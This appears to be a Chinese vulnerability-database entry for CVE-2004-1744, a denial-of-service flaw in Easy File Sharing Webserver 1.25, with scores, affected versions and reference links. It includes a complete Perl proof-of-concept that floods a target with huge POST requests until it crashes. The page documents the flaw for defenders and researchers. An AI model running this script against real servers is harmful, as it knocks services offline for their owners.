CVE-2004-1744
CVSS5.0
发布时间 :2004-08-24 00:00:00
修订时间 :2016-10-17 23:00:20
NMCOE    

[原文]Easy File Sharing (EFS) Webserver 1.25 allows remote attackers to cause a denial of service (CPU consumption or crash) via many large HTTP requests.


[CNNVD]Easy File Sharing Web Server远程服务拒绝漏洞(CNNVD-200408-216)

        Easy File Sharing (EFS) Webserver 1.25 版本存在漏洞。远程攻击者借助许多超大HTTP请求导致服务拒绝(CPU消耗或者崩溃)。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:efs_software:efs_web_server:1.25
cpe:/a:efs_software:efs_web_server:1.2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1744
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1744
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200408-216
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=109341398102863&w=2
(UNKNOWN)  BUGTRAQ  20040824 Easy File Sharing Webserver v1.25 Vulnerabilities
http://securitytracker.com/id?1011045
(UNKNOWN)  SECTRACK  1011045
http://www.gulftech.org/?node=research&article_id=00045-08242004
(VENDOR_ADVISORY)  MISC  http://www.gulftech.org/?node=research&article_id=00045-08242004
http://www.securityfocus.com/bid/11036
(VENDOR_ADVISORY)  BID  11036
http://xforce.iss.net/xforce/xfdb/17110
(VENDOR_ADVISORY)  XF  easyfilesharing-http-request-dos(17110)

- 漏洞信息

Easy File Sharing Web Server远程服务拒绝漏洞
中危 其他
2004-08-24 00:00:00 2006-11-07 00:00:00
远程  
        Easy File Sharing (EFS) Webserver 1.25 版本存在漏洞。远程攻击者借助许多超大HTTP请求导致服务拒绝(CPU消耗或者崩溃)。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (423)

Easy File Sharing Webserver 1.25 Denial of Service Exploit (EDBID:423)
windows dos
2004-08-27 Verified
0 GulfTech Security
N/A [点击下载]
##################################################### 
# Easy File Sharing Webserver v1.25 Denial Of Service 
# Proof Of Concept Code By GulfTech Security Research 
##################################################### 
# Easy File Sharing Webserver v1.25 will consume 99% 
# of CPU usage until it crashes when sent large req's 
##################################################### 

use IO::Socket; 

print "=====================================================n". 
      " Easy File Sharing Webserver v1.25 Denial Of Service n". 
  "=====================================================n"; 

unless (@ARGV > 1) { die("usage: efswsdos.pl host port"); } 

my $remote_host = $ARGV[0]; 
my $remote_port = $ARGV[1]; 
my $done = "15121512"; 
my $buff = "A" x 1000000; 
my $post = "POST /".$buff." HTTP/1.0 ".$done; 

print "
DoS'ing Server $remote_host Press ctrl+c to stopn"; 

while ($post) { 
for (my $i=1; $i<10; $i++) { 
my $i = IO::Socket::INET->new( Proto => "tcp", 
      PeerAddr   => $remote_host, 
  PeerPort   => $remote_port, 
      Timeout   => '10000', 
      Type       => SOCK_STREAM, 
      ) || die("
Server Is Dead!"); 

print $i $post; 
$i->autoflush(1); 
  } 
} 
close $i; 

# milw0rm.com [2004-08-27]
		

- 漏洞信息

9175
Easy File Sharing Web Server HTTP Request Saturation DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

Easy File Sharing Web Server contains a flaw that may allow a remote denial of service. The issue is triggered when a number of large HTTP requests are sent, and will result in loss of availability for the service and possibly the platform by using all available CPU resources.

- 时间线

2004-08-24 Unknow
2004-08-24 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站